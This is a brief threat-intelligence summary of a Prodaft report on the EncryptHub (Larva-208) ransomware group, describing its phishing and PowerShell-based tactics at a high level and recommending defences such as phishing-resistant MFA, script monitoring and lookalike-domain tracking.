What happened?
On 26 February, cybersecurity firm Prodaft published a report on the cybercrime threat group known as "EncryptHub" or "Larva-208". The group has been active since at least June 2024, launching attacks against several hundred victim organisations resulting in the theft and encryption of data.
The group reportedly employs SMS phishing, voice phishing and fake login pages that mimic well-known VPN services such as Cisco AnyConnect, Palo Alto GlobalProtect, and Microsoft 365 to deceive their victims. Once they gain access, EncryptHub installs Remote Monitoring and Management (RMM) software to maintain control, and deploy a range of malware, including information stealers and ransomware.
As is commonplace in financially motivated cyberattacks, there are indications that the group may act as initial access brokers or affiliates, working on behalf of other groups. According to the detailed report, EncryptHub is linked to other notorious groups like RansomHub and BlackSuit. Their attacks are characterised by the use of custom PowerShell scripts and a unique PowerShell-based ransomware encryptor, which encrypts files and demands ransom payments in the USDT cryptocurrency via Telegram.
So what?
Every day is a school day in the world of cybersecurity, so understanding the specific and general tactics of groups such as this is critical to ensure that businesses are prioritising defences to address the most likely paths to attacks.
EncryptHub's primary attack vector is email phishing, making it essential for organisations to bolster their defences against this common vector. Email filtering systems, continuous monitoring for unusual logins and employee awareness are key.
Similarly, the default use of multi-factor authentication which is phishing-resistant is critical. This includes the use of hardware or app-based authenticators which do not rely on SMS, which can be easily overcome.
As the group and many like it use PowerShell or the use of automated scripts to achieve their goals, the enablement of script monitoring across networks, and disabling the use of the PowerShell tool, where not necessary for business functionality is advised.
EncryptHub uses multiple domains to conduct phishing attacks. Organisations should consider monitoring for newly registered domains which mimic their brands. In addition, companies should have a pre-prepared incident response plan and team in place to react to detection or compromise.
To effectively hunt for threats like EncryptHub, network defenders can use the following resources, Prodaft's Larva-208 Report provides valuable insights into EncryptHub's tactics, techniques, and procedures (TTPs). It can be accessed here.